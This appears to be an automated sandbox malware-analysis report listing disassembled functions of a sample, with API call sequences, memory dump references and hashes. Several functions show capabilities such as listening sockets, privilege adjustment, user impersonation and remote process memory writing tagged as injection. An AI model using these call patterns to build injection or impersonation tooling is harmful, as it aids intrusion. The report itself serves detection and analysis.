API ID: CleanupStartupbindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3327401275-0
Opcode ID: c15f761b81780815137c84394c429b479624d45749162729be3872c1a9fed357
Instruction ID: d6ff9f9bf889e3d30cafde90929b0a0e3319cd98dae3a9bed4ce04ed0c7491c1
Opcode Fuzzy Hash: c15f761b81780815137c84394c429b479624d45749162729be3872c1a9fed357
Instruction Fuzzy Hash: 6A118675E403146ADB10EBF99C45EBEB6BCDF08724F004566FA64E61C1F6748A058774

Function 03D7725B Relevance: 9.1, APIs: 6, Instructions: 54networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D72B61: WSAStartup.WS2_32(00000202,?), ref: 03D72B7F
Part of subcall function 03D72B61: WSACleanup.WS2_32 ref: 03D72B89

socket.WS2_32(00000002,00000001,00000000), ref: 03D77273
htons.WS2_32(00000001), ref: 03D7728F
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 03D772A8
closesocket.WS2_32(00000000), ref: 03D772B3
bind.WS2_32(00000000,03D7730D,00000010), ref: 03D772C1
listen.WS2_32(00000000,?), ref: 03D772CF

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CleanupStartupbindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 3027695370-0
Opcode ID: d480267a248c176be8787fbb9d78d7f6a34e28d606e0c4e8dc8c9f0285690069
Instruction ID: 0ddcf92d97412d75197eb743522df296bfd9adf61402a13effa18f323a1e0edc
Opcode Fuzzy Hash: d480267a248c176be8787fbb9d78d7f6a34e28d606e0c4e8dc8c9f0285690069
Instruction Fuzzy Hash: B601B535A00624BADB12EFA58C45AFEBA39EF45A10F540606F950EA294F730874183F5

Function 03D8D2CE Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 03D90D6D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03D90D82
UnhandledExceptionFilter.KERNEL32(03D98C28), ref: 03D90D8D
GetCurrentProcess.KERNEL32(C0000409), ref: 03D90DA9
TerminateProcess.KERNEL32(00000000), ref: 03D90DB0

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 007043f857ef55717e37e1ce53797145011cc83e7a4fd67a1ba099730528f2d1
Instruction ID: d4987fe0c515dd88c110edb0d37ff8909d04a668cd1ec0084f11e1cf26cefd31
Opcode Fuzzy Hash: 007043f857ef55717e37e1ce53797145011cc83e7a4fd67a1ba099730528f2d1
Instruction Fuzzy Hash: 7521CEB680AB04DFD740FF65F688614BBF8FB48B20F18041AE40887388E774D5848F16

Function 00401A60 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
GetCurrentProcess.KERNEL32 ref: 00401AC8
TerminateProcess.KERNEL32 ref: 00401AD9
abort.MSVCRT ref: 00401AE2

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 493375e879d5ba719f0db2fff1e7adaa96f2e86e454be9a8a7c04f475a5b54e9
Instruction ID: 361810d29ac37e85646256d4b4d75fc176be453dc03f436097518843ef23346a
Opcode Fuzzy Hash: 493375e879d5ba719f0db2fff1e7adaa96f2e86e454be9a8a7c04f475a5b54e9
Instruction Fuzzy Hash: A511D4B49047048FC700EF79EA4860EBBF0EB48305F418939E989AB361E77599548F9A

Function 004019A0 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004019DF
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 004019F0
GetCurrentThreadId.KERNEL32 ref: 004019F8
GetTickCount.KERNEL32 ref: 00401A00
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 00401A0F

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 4d47b3eba0c1003e726e4f3845ed9e27162070573c05816e0c3115a08e0278a5
Instruction ID: 31c6794edc2978601c0862c8089c9b4280fc5530b55ffd48b7909d313a443169
Opcode Fuzzy Hash: 4d47b3eba0c1003e726e4f3845ed9e27162070573c05816e0c3115a08e0278a5
Instruction Fuzzy Hash: 221170B56093008FC700EF79EA8854BBBE5FB88355F050C3AE445DB321EA35D959CB96

Function 00401A5C Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
GetCurrentProcess.KERNEL32 ref: 00401AC8
TerminateProcess.KERNEL32 ref: 00401AD9
abort.MSVCRT ref: 00401AE2

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 88d9c2410744339773f86cc0dddd4008b9b36e90b2dcd66861ac33cbc7ef2594
Instruction ID: 0bc6e90ba90b0102660cd8caa8ea38da4bab4723f44484660600e8d3f19e9255
Opcode Fuzzy Hash: 88d9c2410744339773f86cc0dddd4008b9b36e90b2dcd66861ac33cbc7ef2594
Instruction Fuzzy Hash: DA1105B5900604CFC700EF79EA4860A7BF0EB08301F418539E949AB361E7B4A954CF9A

Function 03D7BFB7 Relevance: 7.5, APIs: 5, Instructions: 46networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D72B61: WSAStartup.WS2_32(00000202,?), ref: 03D72B7F
Part of subcall function 03D72B61: WSACleanup.WS2_32 ref: 03D72B89

socket.WS2_32(00000002,00000001,00000000), ref: 03D7BFC9
closesocket.WS2_32(00000000), ref: 03D7BFD6
htons.WS2_32(?), ref: 03D7BFE7
bind.WS2_32(00000000,?,00000010), ref: 03D7BFFE
listen.WS2_32(00000000,00000078), ref: 03D7C00F

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CleanupStartupbindclosesockethtonslistensocket
String ID:
API String ID: 3713690034-0
Opcode ID: 918e21b6b1a206e48f892fe158f16094767f26c630d31ca5ceb165b7ab47e946
Instruction ID: d4d3fa81ca65fc8f35a87aa022f4f1fe7a5184066315b9e9c8b0764567df9d5c
Opcode Fuzzy Hash: 918e21b6b1a206e48f892fe158f16094767f26c630d31ca5ceb165b7ab47e946
Instruction Fuzzy Hash: 48018139D90714B9EF10FBB89C06FBE722CDF05B20F404742F965AA1D1F7B0865256A6

Function 03D73751 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 03D737AD
AdjustTokenPrivileges.ADVAPI32(?,00000000,03D739B5,00000000,00000000,00000000,?,?,?,00000001), ref: 03D737D0
GetLastError.KERNEL32(?,?,?,00000001), ref: 03D737DA

Part of subcall function 03D71726: _vwprintf.LIBCMT ref: 03D71730
Part of subcall function 03D71726: _vswprintf_s.LIBCMT ref: 03D71754

Strings

%s, xrefs: 03D737E7

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
String ID: %s
API String ID: 2004037343-620797490
Opcode ID: 78ea909be67f74969b267d73826c24ddccd25c6ff2020d5eaf1004cfe55a1a96
Instruction ID: 2e1345ac2365ad01b9c3d9f063dff059421501098bb8231219e1cca26fe57329
Opcode Fuzzy Hash: 78ea909be67f74969b267d73826c24ddccd25c6ff2020d5eaf1004cfe55a1a96
Instruction Fuzzy Hash: 23116DB6900219BBEB10DFA9DC459EFBBBCEF08640F100426F904EA150E631DA189AF1

Function 03D7B9E9 Relevance: 6.1, APIs: 4, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D7B6B4: CloseHandle.KERNEL32(?), ref: 03D7B6BE
Part of subcall function 03D7B6B4: RevertToSelf.ADVAPI32 ref: 03D7B6CB

LogonUserA.ADVAPI32(?,?,03D7BB96,00000009,00000003,03DAAEA4), ref: 03D7BA06
GetLastError.KERNEL32(?,03D7BB96,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 03D7BA10

Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F52
Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F62

Part of subcall function 03D72E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,03D7406E,00000400,?,03D73E93,03D7406E,?,00000400), ref: 03D72EAF
Part of subcall function 03D72E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,03D7406E,03D73E93,?,03D73E93,03D7406E,?,00000400,?,?,?,?,03D7406E), ref: 03D72EC8

Part of subcall function 03D7B6F0: _memset.LIBCMT ref: 03D7B714
Part of subcall function 03D7B6F0: _memset.LIBCMT ref: 03D7B722
Part of subcall function 03D7B6F0: _memset.LIBCMT ref: 03D7B730
Part of subcall function 03D7B6F0: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,03D7B7CF,?,?,?,?,?,03D7B7CF,?,?), ref: 03D7B74D

ImpersonateLoggedOnUser.ADVAPI32(?,03D7BB96,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 03D7BA2B
GetLastError.KERNEL32(?,03D7BB96,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 03D7BA35

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$ByteCharErrorLastMultiUserWide_malloc$CloseHandleImpersonateInformationLoggedLogonRevertSelfToken
String ID:
API String ID: 2878441771-0
Opcode ID: 8ff44ade01899871e6f5cb229164ffc9a1ae4631b34ccb3510afdc50ae8e02a6
Instruction ID: 09f08a4a046d2a642d83444142cd994c66af9cde7e6031a59826cf6a759c7af4
Opcode Fuzzy Hash: 8ff44ade01899871e6f5cb229164ffc9a1ae4631b34ccb3510afdc50ae8e02a6
Instruction Fuzzy Hash: 3921B1B7A04304BFDB11BF60ED09F6A3F69EB05710F148526F90899264FBB68A14DB60

Function 03D76BE7 Relevance: 6.1, APIs: 4, Instructions: 63sleepnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D76BF6

Part of subcall function 03D72B61: WSAStartup.WS2_32(00000202,?), ref: 03D72B7F
Part of subcall function 03D72B61: WSACleanup.WS2_32 ref: 03D72B89

Sleep.KERNEL32(000003E8), ref: 03D76C46
GetTickCount.KERNEL32 ref: 03D76C4C
WSAGetLastError.WS2_32 ref: 03D76C52

Part of subcall function 03D76BA1: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 03D76BB3

Part of subcall function 03D76371: _memset.LIBCMT ref: 03D76392

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTick$CleanupErrorLastSleepStartup_memsetioctlsocket
String ID:
API String ID: 1195850169-0
Opcode ID: f22d9dc79591360d93269051ce4cc76ffe8b5d4c080b26780a932eaaf4ae2e15
Instruction ID: dc9d9799655b5d601047c825858cb793ef76b9b107e397bc462aef23bd34b93c
Opcode Fuzzy Hash: f22d9dc79591360d93269051ce4cc76ffe8b5d4c080b26780a932eaaf4ae2e15
Instruction Fuzzy Hash: 6F11E137C04608ABCB01F7B4AC869AE7BB8DB44624F240423F600AA180FE31DA8557A5

Function 03D943C0 Relevance: 5.6, Strings: 4, Instructions: 612COMMON

Download Yara Rule

Strings

abcdefghijklmnop, xrefs: 03D943CA
abcdefghijklmnop, xrefs: 03D943CB
<, xrefs: 03D94746
, xrefs: 03D9473C

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID: $<$abcdefghijklmnop$abcdefghijklmnop
API String ID: 0-3339112986
Opcode ID: edbeecbdd1a89b55094cadacdb26962ac6cf2e46357528791c1314a6ed00cb8b
Instruction ID: 340bb15802f4ad59e06c9fa4eb190d97de702829ba0e8d679a91290da9b4e431
Opcode Fuzzy Hash: edbeecbdd1a89b55094cadacdb26962ac6cf2e46357528791c1314a6ed00cb8b
Instruction Fuzzy Hash: 5E52E275A101198FDB48CF69D491AADBBF1FF8D300F14C16AE866AB342C634E951CFA4

Function 03D7550C Relevance: 4.6, APIs: 3, Instructions: 57memoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D7552B

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,?,00000000,00000000,00000000,00000000,?), ref: 03D7555E
WriteProcessMemory.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 03D75576

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AllocAllocateHeapMemoryProcessVirtualWrite_malloc
String ID:
API String ID: 4067662499-0
Opcode ID: 299808e619108ce82b16380988e0acf820ea138a2221b9804e228f35f279dd8a
Instruction ID: 551dfa2a5f70523e0c9b510058e806727a3f604d7cd543ea2f250dd54374284b
Opcode Fuzzy Hash: 299808e619108ce82b16380988e0acf820ea138a2221b9804e228f35f279dd8a
Instruction Fuzzy Hash: D1019B71900318BBCB11EFA99C44B8FBBBAEF46B50F544055B904E7241E771AA508B94

Function 03D7BBA5 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,74DF2E90,?,?,?,03D76E7D), ref: 03D7BBD8
CheckTokenMembership.ADVAPI32(00000000,?,03D76E7D,?,?,?,03D76E7D), ref: 03D7BBED
FreeSid.ADVAPI32(?,?,?,?,03D76E7D), ref: 03D7BBFD

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c21743f04503a38ec79a1c4e2edac9dfed9f34462859e40611fba0f50ec58f79
Instruction ID: 0f35962ed7135633562c81ad0d0bcd2ac8c950e700f1c24a06f388b885715e79
Opcode Fuzzy Hash: c21743f04503a38ec79a1c4e2edac9dfed9f34462859e40611fba0f50ec58f79
Instruction Fuzzy Hash: 4D01817290028CFFDB01DBE88884ADDBFBCEB15600F4484DAE501A3241D2705704DB25

Function 03D95210 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ef255b0ed822c0c657ab21daf14239d505dcef6c409dedac2737ab52f18792
Instruction ID: bc25dd0d9b35501bbbc88338715579dab12399f296e67d34b699c2a9f51dc0e2
Opcode Fuzzy Hash: c6ef255b0ed822c0c657ab21daf14239d505dcef6c409dedac2737ab52f18792
Instruction Fuzzy Hash: 481274329241598FDB08CF5DD8A1ABDBBF1EF49301F44816EE456AF386C638EA11DB50

Function 0399465E Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc46112676e2f99f65351f06fd34e61db1380de43a5743537da4af89db485184
Instruction ID: b37c0313d707b4f516939f725f37ec543deb4aa9e02a7e0474497d9c13f0c6a9
Opcode Fuzzy Hash: bc46112676e2f99f65351f06fd34e61db1380de43a5743537da4af89db485184
Instruction Fuzzy Hash: C81294319141698FDB08CF9DC8D1ABDBBF1EF49301F14826EE4569B386CA38E512DB50

Function 03D94C40 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7367673e1dbf2ce65efce77a9eab863fe37500ce5fd798c683fb4045677610dd
Instruction ID: 78923bf26bc92209ad4b4bc3168e0e3189a3e81d80e00b3d03ec3bd7ffcda460
Opcode Fuzzy Hash: 7367673e1dbf2ce65efce77a9eab863fe37500ce5fd798c683fb4045677610dd
Instruction Fuzzy Hash: 59123C729141598FCB08CF5DD4A19BDBBF1EB49300F49816AE496AF386C638EA11DB60

Function 0399408E Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5766cd7a95bd6f764efa1aecf894e3aed280c26a93c7a4905d360df561bf92
Instruction ID: 588a8d5925ab1b074726295bad0c7fe22e933699535d2b643adeaa91069f4568
Opcode Fuzzy Hash: 8b5766cd7a95bd6f764efa1aecf894e3aed280c26a93c7a4905d360df561bf92
Instruction Fuzzy Hash: F71270319101698FDB08CF5DC8D19BDBBF1FF4A340F59826AE456AB382C638E652CB50

Function 03D92A9D Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: c82d010db55c768f105fba40b2ed246d6746ba13ff410aea65e9acff4d4b8fdd
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 06D17F73C0A9B74A9B36C12D455823BEEA26FC1A9131FCBE29CD43F28DD1279D0496D0

Function 03991EEB Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: e7f99bc13a5765b3fe69806d9f448fb73db9ce4e8d267ebc4f320c8d343c5b12
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: A4D17A73C0A9F30AAF36C26D406863EEA667FD158031FC7E29CD43F28996269D10C6D0

Function 03D9267D Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 33c7a1d29f8af0b01a3eb8f443ca1b5328daa702006194a7755142184fa40518
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 78D17173C0A9B75A9B35C12D455863BEBA26FC1A9031FCBE3DCD43F289D2269D0496D0

